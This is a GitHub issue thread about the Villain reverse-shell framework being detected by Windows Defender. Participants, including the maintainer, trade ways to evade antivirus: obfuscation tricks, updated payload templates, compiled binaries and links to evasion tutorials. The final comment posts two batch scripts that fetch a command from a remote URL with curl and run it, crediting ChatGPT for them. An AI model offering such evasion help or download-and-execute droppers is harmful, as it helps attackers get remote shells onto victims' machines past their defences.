Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Villain gets detected by windows defender #15

Closed
edikiuspy opened this issue Nov 25, 2022 · 26 comments
Closed

Villain gets detected by windows defender #15

edikiuspy opened this issue Nov 25, 2022 · 26 comments

Comments

@edikiuspy
Copy link

image
I used obfuscate option but still got detected.

@keralahacker
Copy link

image
Using obfuscate option getting detected

@anonyvietofficial
Copy link

same issus

@t3l3machus
Copy link
Owner

I made a small update in the payload templates and it seems to do the trick again (for now).
You should not expect this to last forever (by this or any other tool), the obfuscate function is there to assist you, not to do the job for you.

I will try to update the templates and improve the general functionality of Villain in time but there will be ups and downs, it's inevitable. I encourage you to look into AV evasion techniques both manually and by using automated tools, you can start by checking this repo out -> https://github.com/sinfulz/JustEvadeBro or some of the videos I've made.

image

@t3l3machus
Copy link
Owner

I am intentionally leaving this open indefinitely.

@t3l3machus t3l3machus reopened this Nov 27, 2022
@edikiuspy edikiuspy changed the title Villian gets detected by windows defender Villain gets detected by windows defender Nov 27, 2022
@edikiuspy
Copy link
Author

@t3l3machus unfortunately with new windows defender update same issue again

@gaalos
Copy link

gaalos commented Dec 1, 2022

You might "cypher" de string unsing key ?

@t3l3machus
Copy link
Owner

I made a video to give you ideas on how to bypass detection. I can update the templates or the auto-obf function but it's not worth it. https://www.youtube.com/watch?v=FVbdZSGkzhs

@edikiuspy
Copy link
Author

Thank you for response. Your tool is very useful and great work!

@t3l3machus
Copy link
Owner

@edikiuspy thank you :))

@gaalos
Copy link

gaalos commented Dec 2, 2022

@t3l3machus Nicely done for your explain.
Maybe you can use :
image
in your can obfuscate it by changing variable names.
Add OR AND conditions automaticly ? :)
The goal here is to not touch the payload generated ;)

@t3l3machus
Copy link
Owner

@gaalos That was the goal at the beginning. It doesn't matter how complicated i make it, it will just keep getting flagged and at some point the payload will be burned. I have tried many other tricks (including various string operations, adding logical operators here and there, it doesn't work).

@gaalos
Copy link

gaalos commented Dec 2, 2022

@t3l3machus yes it's true ^^.
Maybe create payload without powershell as binary file ?

@t3l3machus
Copy link
Owner

@gaalos yeah i have already done it! I will update soon with an additional windows cmd payload template

@gaalos
Copy link

gaalos commented Dec 2, 2022

@t3l3machus Thx for your work ! Your code make me happy ton explain somes risk to my students :=)

@rikda
Copy link

rikda commented Dec 12, 2022

image

detected by AV

@dmcxblue
Copy link

@rikda It will eventually get detected, you need to apply your own magic to bypass.

@aksrivastava
Copy link

aksrivastava commented Jan 5, 2023

if you want to bypass defender please try these techniques

https://youtu.be/EZOW40S_cTM

@gaalos
Copy link

gaalos commented Jan 6, 2023

@t3l3machus when did you do the update about "

Maybe create payload without powershell as binary file ?

Hey @t3l3machus when did you update it with binary payload ? :p

@t3l3machus
Copy link
Owner

@gaalos haven;t done such update and don't intent to. Other things are in order for Villain (after i release a new tool probably next Monday) :)

@Envincion
Copy link

@gaalos haven;t done such update and don't intent to. Other things are in order for Villain (after i release a new tool probably next Monday) :)

For me its still working like a charm ,but im wondring if there's a way to fix the payload to be able to work on OS Windows 8.1 ,it giving me this
image

@aksrivastava
Copy link

convert your PowerShell script into EXE in 2 seconds watch the video - https://youtube.com/shorts/1uxvjBPqu7I?feature=share

@Envincion
Copy link

Envincion commented Jan 11, 2023

convert your PowerShell script into EXE in 2 seconds watch the video - https://youtube.com/shorts/1uxvjBPqu7I?feature=share

Thank you for your replay, but unfortunately converting ps to exe doesn't help to get the reverse shell working
it works on widows 10 - 11 - server 2018 , but not ( Windows 8.1 )

@gaalos
Copy link

gaalos commented Jan 12, 2023

convert your PowerShell script into EXE in 2 seconds watch the video - https://youtube.com/shorts/1uxvjBPqu7I?feature=share

not working because it's just executing script, not a real BINARY/EXE File :)

@UdayA6796
Copy link

Does someone have the older version of villain? if yes can you guys send the file here pls

@F0rW0rk1
Copy link

F0rW0rk1 commented Aug 3, 2023

The last version of Villain still gets detected by windows defender. The obfustacte function doesn't work for the netcat templates, i got this error "Ignoring unsupported arguments: OBFUSCATE" and add the obfuscate attrinut doesn't work either. Does someone how i can make this work ?

@gaalos
Copy link

gaalos commented Aug 3, 2023

Hey all i use something like curl to ... and it's work
Thx to chatGPT

run.bat
`
@echo off

REM Remplacez l'URL par celle que vous souhaitez appeler
set "url=https://raw.githubusercontent.com/gaalos/dontdo/main/run-http"

REM Effectue la requête curl à partir de l'URL et stocke la sortie dans une variable
for /f "usebackq delims=" %%i in (curl %url%) do set "curl_output=%%i"

REM Exécute la sortie de la variable comme une commande
cmd /k %curl_output%

REM Terminer le script
exit
`

or
`
@echo off

REM Remplacez l'URL par celle que vous souhaitez appeler
set "url=https://raw.githubusercontent.com/gaalos/dontdo/main/run"

REM Effectue la requête curl à partir de l'URL et stocke la sortie dans une variable
for /f "usebackq delims=" %%i in (curl %url%) do set "curl_output=%%i"

REM Exécute la sortie de la variable comme une commande
start /B cmd /k %curl_output%

REM Terminer le script
exit `

@t3l3machus Maybe you can try to create cmd/powreshell base on curl call ?
Obviously the "victim" need to get grant access to the external url

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests